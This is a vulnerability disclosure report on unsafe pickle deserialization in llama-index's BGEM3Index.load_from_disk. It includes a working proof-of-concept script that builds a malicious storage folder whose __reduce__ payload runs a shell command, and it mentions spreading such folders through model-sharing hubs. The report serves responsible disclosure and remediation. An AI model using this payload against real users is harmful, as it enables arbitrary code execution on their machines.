--- ### Vulnerability Overview - **Vulnerability Type**: CWE-434: Arbitrary File Upload with Dangerous Type - **Severity**: High (8.8) - **Attack Vector**: Network - **Attack Complexity**: Low - **Required Privileges**: None - **User Interaction**: Required - **Scope**: Unchanged - **Confidentiality Impact**: High - **Integrity Impact**: High - **Availability Impact**: High - **Vulnerable Codebase**: Pypi - **Affected Version**: 0.11.16 - **Vulnerability Status**: Informative - **Discoverer**: - **User**: life-team2024 @life-team2024 - **User Level**: MIDDLEWEIGHT --- ### Vulnerability Details - **Target**: - **Environment**: ```python python == 3.10.12 llama-index == 0.11.16 ``` - **Core Issue**: Attackers can exploit malicious pickle files to trigger arbitrary code execution via the `load_from_disk` function. - **Vulnerable Code**: - **Code**: ```python def load_from_disk( cls, persist_dir: str, model_name: str = "BAAI/bge-m3", index_name: str = "", weights_for_different_modes: List[float] = None, ) -> "BGEM3Index": sc = StorageContext.from_defaults(persist_dir=persist_dir) index = BGEM3Index( model_name=model_name, index_name=index_name, index_struct=sc.index_store.index_structs()[0], storage_context=sc, weights_for_different_modes=weights_for_different_modes, ) docs_pos_to_node_id = { int(k): v for k, v in index.index_struct.nodes_dict.items() } index._docs_pos_to_node_id = docs_pos_to_node_id index._multi_embed_store = pickle.load( open(Path(persist_dir) / "multi_embed_store.pkl", "rb") ) return index ``` - **Vulnerability Analysis**: The `pickle.load()` function is used within `load_from_disk()`. When a victim loads a file containing a class that defines the `__reduce__` method, this method is automatically executed — a feature of Python’s pickle deserialization mechanism. This vulnerability allows attackers to trigger unintended code execution or run arbitrary commands. - **Proof of Concept**: - **Concept**: I configured the `__reduce__` function to execute the `touch ./team-life` command and created a malicious folder structure matching the required format for BGEM3Index. - **Code**: ```python import os import pickle from llama_index.indices.managed.bge_m3 import BGEM3Index class RCE: def __reduce__(self): return (os.system, ("touch ./team-life",)) def generate_malicious_pkl(): payload = pickle.dumps(RCE()) os.makedirs("storage", exist_ok=True) with open("storage/multi_embed_store.pkl", "wb") as f: f.write(payload) with open("storage/docstore.json", "w") as f: f.write('{"docstore": "docstore"}') with open("storage/index_store.json", "w") as f: f.write('{"index_store/data": {"idx1": {"__type__": "vector_store", "__data__": {}}}}') with open("storage/default_vector_store.json", "w") as f: f.write('{"vectorstore": "vectorstore"}') if __name__ == "__main__": generate_malicious_pkl() ``` - **After Running Code**: The attacker can create a malicious folder named `storage`. - **If Victim Downloads the Storage Folder and Runs `BGEM3Index.load_from_disk(persist_dir="storage")`**: The command `touch ./team-life` executes on the victim’s PC. - **Inspiration**: I was inspired by the following vulnerability reports to identify and report this issue: [Article 1](#), [Article 2](#), [Article 3](#) - **Remediation Suggestion**: Since the vulnerability arises during `pickle.load()`, it is recommended to either remove this class or add a parameter such as `allow_dangerous_pkload` to explicitly warn users about the risks of using this function. - **Impact**: If attackers upload malicious folders to model-sharing platforms like Hugging Face Hub, they can launch attacks on multiple PCs that download and load the model. --- ### Incident History and Discussion - **Control Permissions**: - **Incident History and Details**: - Marked as `info` level and listed alongside similar vulnerability reports targeting the `run-llama/llama_index` team. - **Security vulnerability report submitted to project maintainers on GitHub**, one year ago. - **Report severity downgraded by ETF-runner-helper**, one year ago. - **Project maintainers confirmed the report**, one year ago. - **Planned release date automatically extended from January 2, 2025, to January 9, 2025**, one year ago. - **Comment by run-llama/llama_index maintainer**, one year ago. - **Comment by life-team2024**, one year ago. - **Comment by ETF-runner-helper**, one year ago. - **Comment by life-team2024**, one year ago. - **Automated Actions**: - Report submitted to internal tracking system, one year ago. - Project maintainers of run-llama/llama_index notified, one year ago. - Research capability penalized for misjudging severity.